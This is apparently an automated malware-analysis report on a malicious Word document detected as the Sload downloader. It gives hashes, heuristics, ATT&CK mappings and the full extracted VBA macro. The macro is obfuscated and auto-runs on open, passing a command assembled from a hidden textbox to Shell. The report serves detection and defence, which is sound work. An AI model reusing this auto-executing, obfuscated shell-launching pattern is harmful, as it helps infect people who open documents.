Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 24e15f79c89f7fab…

MALICIOUS

Office (OLE)

82.4 KB Created: 2018-12-14 17:17:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: 387134eb573097cae1ac7e7bc51b59d3 SHA-1: 5d6da5066c68facb737d508f234ff2d63fee3cb5 SHA-256: 24e15f79c89f7faba99ddeaad817ef9b3deeff1782d43d1d2403d22d4f57d6de
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The autoopen macro triggers the execution of cmd.exe and PowerShell, indicating it's designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Downloader.Sload-6786419-0' further supports its role as a downloader.

Heuristics 10

  • ClamAV: Doc.Downloader.Sload-6786419-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Sload-6786419-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
   Select Case nQzIKtaZpHzqHSOnpTw
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
rdsHZ
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8876 bytes
SHA-256: 908ba386dfd98d415943aaac7ecdfef8d7ebdbf23ff2df41aca9adff84ff3cd8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
231 of 275 identifiers look randomly generated (e.g. 'AoNKQssDaUsEPZKiqjUCGhcz') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "pXirGKdhzK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
rdsHZ
End Sub

Attribute VB_Name = "jwCWVLSqL"
Function rdsHZ()
On Error Resume Next
   Select Case OPjwrUumFokdYaNJXofnKYv
      Case 161731550
         tRVPNFIltHvESaKiYZaU = PpfrqObqkpTKRz
         YWsibrfSREFOVJ = Log(zVDcdbqYXqhuISctAcHFBh)
         sKkWNmkzFhzqwGpUbiwVsuw = 151270208
         pLEmOEkSdLRtFc = mrbNKbimLHfWDLzwONVYb
      Case 211058640
         rdNYUvYaWGMiBTjM = 165990150
         ZtijhjGdMDjjDKGd = Log(kzDJqmhIPqcwiiAwNCmiI)
         jSqjVunCCcXjzOVBiGzaSqdf = 224046435
         fmqITuboQlSHRnVNoAb = Log(fmaLTflhdqoLBwOALuJcIKz)
   End Select
Set ibpKFEBdEmttMionJtLaw = GUYUBuqwmUopcsq
   Select Case MkbaRMulSIojIXadv
      Case 129720147
         wFVZFEXiFbuiBiQ = EEwwpIhCqHQbfdEfDSaMqLWV
         ioJXamCrbVZwXQpYTiwowCc = Log(PiiEEEthcCLTXiPUNk)
         HfifBknXcYjzbM = 256912341
         vDznXcrTVFWBpTd = LwUrhzhTQhRIwFjGkWT
      Case 109462163
         zjfnOKwOmhJuFldsv = 173678535
         WdWpLiXQWPRSzNKORoDSokFi = Log(IOqTFOowXtmaqUFruawUPJhu)
         MEsHHmYsqCUhwQBcWb = 125985552
         naTzbuKGJjwjvwtKwoP = Log(NiARkJzJzrthOVj)
   End Select
Set kujNbRiGEolAWrjhMLLFa = NRzAJSqQRaNHZB
   Select Case wWHBzDkwFPnJpNNcwfXXQf
      Case 62592821
         prkdBPWZfSzTuq = jEadhjdIRnYDFmKXTM
         LHTHuqtNiWQthH = Log(oSpBcULjSpdLRmUv)
         GrfLQzfnnVzlBtrvtwsi = 114927561
         jzYARRicaKblnqczXUJOo = MzRvmPXnbMMVHfmQfOILvpJP
      Case 40987762
         TtbXYCwlnaiWfP = 30009655
         iPZRizMHovGcDXoCplwdMD = Log(JZWsMhJitHIGuqoSWhTjdw)
         hPmjjuSaaiaPsLEAai = 81856207
         VuQuLBSawtUKNFpc = Log(AdoajicTavHRjtEQiwm)
   End Select
Set sUfbrihKQBnWcbZBXnoMoalF = JQzPufGCchfzNiBB
   Select Case VQBBXWorVhYBNfQSfJY
      Case 234332107
         MmCbcDiFjSQacDoUAYauZRDM = imnNpfzwaIdwZvSGmlOHalbb
         ikzpXvjqcwRvrunTdBuKWbdI = Log(nfoEYsKLQKuzHCNuIzwBLu)
         bozkjQbDHpAkPulDFHjbjsT = 149797475
         hQOdjHdsoMQbIdvpHnKGSwAW = qubTIjUalzAMZahXrahUczd
      Case 264527052
         cEIQfjPrjpNBZjdwAWiuch = 82921885
         iaXTBRtQnjjiLJFQkVpl = Log(WSuDYbbwtKusjiFLwp)
         wwNsAwkrQOJGsbIMI = 191605100
         dpSStWlmfbAEojXoY = Log(auFnkKkjDCQXWwi)
   End Select
Set MciiTVOMFPQJVaUmjDiiK = FHhKSjVHFDWGTuKuoEfsiU
   Select Case cAbWlCCBSQwDmNQFSHh
      Case 32266878
         jXEiBzaLVNmYadzR = NsiWJJuUqGiUdtKz
         tdWsjFbpwDKfLjSoH = Log(panZOJJLrvqrTcaMkUuSdnD)
         MFkpiWLfVzUXaTPNiYOf = 339838235
         jhFzzwuoQBWHMIZ = hUjKWUHClQEjkFZXjH
      Case 147756069
         kiXNljjTASGHoO = 283762910
         vpiPaCOitNEKczbFlWkDzWZ = Log(koBSKzsVOfbrZHchPoTXbY)
         BrBVRdowZPsimAvYwUiwzXj = 210568394
         uCnIDBOLzAaIcbsaiCbh = Log(phTQXCsctiIVqXbAoWO)
   End Select
Set TpAVPTtqWOUIwCEVTrfz = jDVSnlDQZujNDIAhwB
   Select Case YhCbQoLazirXPotXcp
      Case 87490027
         BhUmkshdzjNDzr = qIWKjAFNSsZMdXXuHnlSqMQq
         HicSUnYXqCOGijBwTC = Log(LjDFalGQNZHdsfnZSduwFBo)
         UIodGjWWKWfrDcBhOWKwiZ = 147370413
         rHjSYDoKrQlRzdKdCkT = AvWpbNkiqpEvmNlwAD
      Case 329729248
         hUAmqkkkMhvwFAa = 315995424
         tqLTGTBLqijrLdzmMofvj = Log(qdzWJuGpmnpNGNmnbBwaAGAt)
         DwLsMuABuziTjK = 49031308
         AsvCwWmzZMiwIwk = Log(GVFzuzatoLLNETrqrVAN)
   End Select
Set rChKLTzPEswPFN = EKKDSCNmKYvFVoFnz
Const UFNwGZw = 0
   Select Case cNQAdYDkAXhjNKzCTpDaWmJS
      Case 128806551
         KoEkDWzFVjdfir = TqRJBazzwiNDjaqDzhaN
         fPUKlIoQYoKMzDvr = Log(ScLpHFqTNffffzDd)
         nazwPSKjYqCqmWuLo = 100423994
         CYXKdqXdIksqGjiQUuKCJAFj = odbIlUriFbpPQUIrp
      Case 12668587
         fzvHDGZRdNoCTnvpNwUXPBIB = 52511381
         AEZCKUwGEPsVYCLCNVRZWbU = Log(uvVijiruzKFUrbCTDMjj)
         rYRLMnmjiWYkuHOzUXaXzWNw = 282068904
         mSzVKsohDXDSWqEL = Log(ojkzTnUjoIIzVKVUB)
   End Select
Set TlNLfvMErwBBjT = FZPFOTfdmVkfhhMhzUqlZD
   Select Case TcILWFbuPRLFOZnFNS
      Case 245425697
         jFPEVwwwUplaRFWr = MpMpDUtjsaZITAkJOm
         NDpYJcZajloJCvjB = Log(YVfkVXdXXqBoAQCTJiS)
         RDMiuNvERXMjzIktGc = 286092256
         MAmmXlfUlqsRRdKVIBqI = YFzdSprfIMjnmLQRZGI
      Case 218897647
         SbivRWwPlFmiDnvmJFw = 262943419
         ddMdfRtEiuibAGiVhATtQX = Log(uEiXVfQBLtmpzSR)
         EEKCLEHChRQcFduYFWRZzu = 158265194
         SsWhOQjDPOPpGUvqwfq = Log(OnvizOjaAsoJjl)
   End Select
Set ShZoQkNMqOESkabcRDTKi = oiAhGCWZFJUldIWraUBaFTuw
   Select Case ijJzRblFYErPJdGfHBNo
      Case 280755963
         JcECXJkZLFFlVAkkvaLIrYMT = aajjSElmkWhsPEcVztmKXIGu
         FndhGlPlFwiDqsAUzk = Log(DsjVinsfaJZRUlMMQHEi)
         SHKHtRJAlqXXdriZRuuNF = 270017693
         ffORifkMvGrllVOoVji = SCtruinzMKQfdffcfAfUBd
      Case 181549676
         lFtDDFYibAJclXXvs = 240391720
         lpLIFqlJVEJmobcFopjwGlmE = Log(VCrIcjbRipcZznMRwDZ)
         OUBIRiGJnsACHjknu = 4788461
         VhVKlAjqCWfKhNmNABirtcS = Log(lpZSRCYWvKEktKPIlsEm)
   End Select
Set iSpUSjlMJzsPrZv = NZzzIOWICUqmZGBXfUC
   Select Case EWYlRLQUORlKHGqDoCij
      Case 25140274
         KwvjjiqNUAAlIkFX = szwucNowwhjwkMMaqMZplb
         dAwkKVzGwQMplFThlGjmwK = Log(knnLRYfhEQLVtfcib)
         bhiYXaVXiojBppTmMzWJfiTj = 47934859
         akZBJcInVcjLQNqutrw = bWBGTfHRTsNzRw
      Case 1950339
         zdiGtBUqGBjJTlpckEwEi = 124054873
         iUrTcOjuSNEwPMrJaBLAS = Log(zziDlONBwDivAlChsbZGOwPo)
         PsuWCWSQfWtlYdShQQB = 116988262
         MGHsJkaLkBiuiWWTit = Log(MiUOIwTwHZzfNWEDmmis)
   End Select
Set rEvVLruHvOmXVFpsrzwqmS = nWUXZSjjABtUaYtwFZqLKK
   Select Case skjlfnhvUODtCn
      Case 332147161
         kZFXbszGvnpXzbqsLTqqUu = mFbPznrcbwFWSUHZzm
         pswKwsYLiizISqESRzdw = Log(DKOatFYXEurDrFcovf)
         bcJuionjNCpZVnJlhj = 234172327
         nzndoFEalciWUH = rtQjmFYKUOUVPiTuELb
      Case 234276715
         ofGYjMvlYSFOQRrRzzz = 93728906
         SPTjosRhZLtXwDOJLCtdZw = Log(PHzQbdEOdVlVQmpvTdDwGLrT)
         dIouEkQWSEcobqEU = 322136895
         CKhzWVHZAVzpDQfCz = Log(PUZkVzwhNGsnwiJwoJ)
   End Select
Set jlSnfjuYcBLJZsjEcpRp = woIAhNXTfGbWWRjzhtAbb
EGZLukHCVif = pXirGKdhzK.TextBox1.Text + PKumhC + SIwqTV + OcGKIou + zDrRvH + hlWbk + tvHQuFlD + lERqfkON + dYmQjzrw + XmTXhpH
   Select Case KtLqRsFiUWiHwNdiSczZqoc
      Case 125736444
         JCpjsGzPNDpfBWBfCEp = lduYGhnhBAWQsRIqQzbP
         skJoCRFwtokmnnfHRcLTP = Log(NhYnjOLPCcZwstkj)
         PhkHMldFiciwWQ = 316019588
         fXbPOirlimHMovmWi = vlfFAwuiFlcRfMdjNWJ
      Case 132339003
         hqzdaiQQjqLQzUKmZWfUjc = 36538913
         NGuiHhPNNjNvjba = Log(iRWuQAirTuoAdzIEl)
         QTjhIBawCOHPGzvNqOGKsM = 158729852
         PNtPjOaIKqLGiw = Log(UUSwTkEoqEQIuzaz)
   End Select
Set vjSuILOnnwEQmo = uEmqZNESKZCKTFjKjsHK
   Select Case FdRNuDEnVhJFBpdPDaEQZ
      Case 306788462
         FvtBpPozHpBpJIsSafrd = pRzirNMfHaJKAMSB
         OXhiCPAATHKHil = Log(RTQdvWwBbTAPrfJwaQXQT)
         bnCziXGCXcpcthwpFjPWFOBz = 62603271
         KKjqGUOVrdawsbvYvX = PlbAlLrBzpNlDnJNvTh
      Case 144672210
         NXqTOHoobhSiYujiKw = 206488692
         SRfdrXKjOzFOBFBOl = Log(WEDMWIvHitZilUBGBwrN)
         qwEacbDcTsUzdbaLGvW = 224521107
         tRJjNlMuDFWYFjIwmthri = Log(AEhHtavvBUirzivq)
   End Select
Set qrhPnwYYvSNTBpqF = RECGslzHEBtOidCwfrAwv
   Select Case tGJIcYwizYnKzzkDCn
      Case 128641181
         zTGGOqQnWEOJnvwUYNazh = BZHWtqPwRczGXZzCtmIK
         vKdWCDPfpNUARSj = Log(swaYanmKhYWUVTorXXFPdzrn)
         QbPfFFHSDBphliIXTpdjuKWZ = 194114494
         uMRVsEnZJLXibSPCRSwJ = pwsKKOGEGFpBcLuBiIkuM
      Case 162032438
         AoNKQssDaUsEPZKiqjUCGhcz = 49453573
         BiJNOYRzrWwDpLNBPh = Log(HfcYZuNrVrTLNDwrKuMFT)
         PholnqJpERuPApYKjTBhvI = 161648635
         jztUDHDcQTPujoHX = Log(jmBQzCGSAKsDlrHJiCnzo)
   End Select
Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
   Select Case nQzIKtaZpHzqHSOnpTw
      Case 80051887
         jCssuZqhcCjijFcnvRWBGlTi = QfAJPbumiEOEPP
         jrNEPLbNlztCcKqwjK = Log(itpYMbosBBOjjBBSOYOTqpS)
         JWYSbnFiuYlbtTAca = 126129683
         MWQNBascaVrApaaOpCW = NvkoHQaYuXlsXPGst
      Case 62395253
         sjLiJDYwASFKaECMQmb = 36961268
         AThDjwdZUiVjiihCQbkiT = Log(FpMLnUDpGRDnrQdbaEv)
         jkjivaVKzKrWQaNrrX = 70349907
         WibDcrmQYpAfnzt = Log(FhQNztqvahWRCmkCun)
   End Select
Set BJjCDoElJJLjTjslJHzIdofd = VUOlFwlzzsLZfMZvHjlPzClJ
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.